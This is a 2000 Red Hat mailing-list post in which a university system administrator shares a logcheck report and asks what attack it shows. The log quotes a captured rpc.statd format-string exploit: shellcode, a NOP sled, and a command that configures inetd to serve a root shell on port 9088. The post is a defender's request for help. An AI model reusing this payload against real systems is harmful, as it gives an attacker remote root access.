anyone seen this attack?

Mon, 06 Nov 2000 09:43:25 -0800 

Has anyone seen this type of attack before? I'm not sure just where to start
looking other than CERT, but is it a dos, or an exploit of a particular
OS/package? Thanks!

Here you go...

Active System Attack Alerts
=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nov  3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!

Security Violations
=-=-=-=-=-=-=-=-=-=
Nov  3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!

Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Nov  3 18:01:00 www CROND[6057]: (root) CMD (run-parts /etc/cron.hourly)
Nov  3 18:10:00 www CROND[6059]: (root) CMD (   /sbin/rmmod -as)
Nov  3 18:20:00 www CROND[6061]: (root) CMD (   /sbin/rmmod -as)
Nov  3 18:30:00 www CROND[6063]: (root) CMD (   /sbin/rmmod -as)
Nov  3 18:40:00 www CROND[6065]: (root) CMD (   /sbin/rmmod -as)
Nov  3 23:45:03 www rpc.statd[366]: SM_MON request for hostname containing
'/': ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x
%08x %08x %08x %08x %08x %08x %08x %08x
%0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20ëK^\211v¬\203î

\215^(\203Æ \211^°\203î \215^.\203Æ \203Ã \203ë#\211^´1À\203î \210F'
\210F*\203Æ \210F«\211F¸°+, \211ó\215N¬\215V¸Í\2001Û\211Ø@Í\200è°ÿÿÿ/bin/sh
-c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
/tmp/m;
Nov  3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
Nov  3 23:45:03 www rpc.statd[366]: STAT_FAIL to localhost for SM_MON of
^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x
%08x %08x %08x %08x %08x %08x %08x
%0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20ëK^\211v¬\203î

\215^(\203Æ \211^°\203î \215^.\203Æ \203Ã \203ë#\211^´1À\203î \210F'
\210F*\203Æ \210F«\211F¸°+, \211ó\215N¬\215V¸Í\2001Û\211Ø@Í\200è°ÿÿÿ/bin/sh
-c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
/tmp/m;
Nov  3 18:50:00 www CROND[6067]: (root) CMD (   /sbin/rmmod -as)
Nov  3 18:50:41 www rhnsd[6068]: running program /usr/sbin/rhn_check
Nov  3 18:50:43 www rhnsd[766]: command returned:
Nov  3 19:00:00 www CROND[6071]: (root) CMD (/bin/sh
/usr/local/etc/logcheck.sh)
Nov  3 19:00:00 www CROND[6072]: (root) CMD (   /sbin/rmmod -as)


Gavin Durman --- Xavier University LAN System Administrator
=================================================
[EMAIL PROTECTED]     ICQ: 20277424     http://durman.xu.edu



_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list

Reply via email to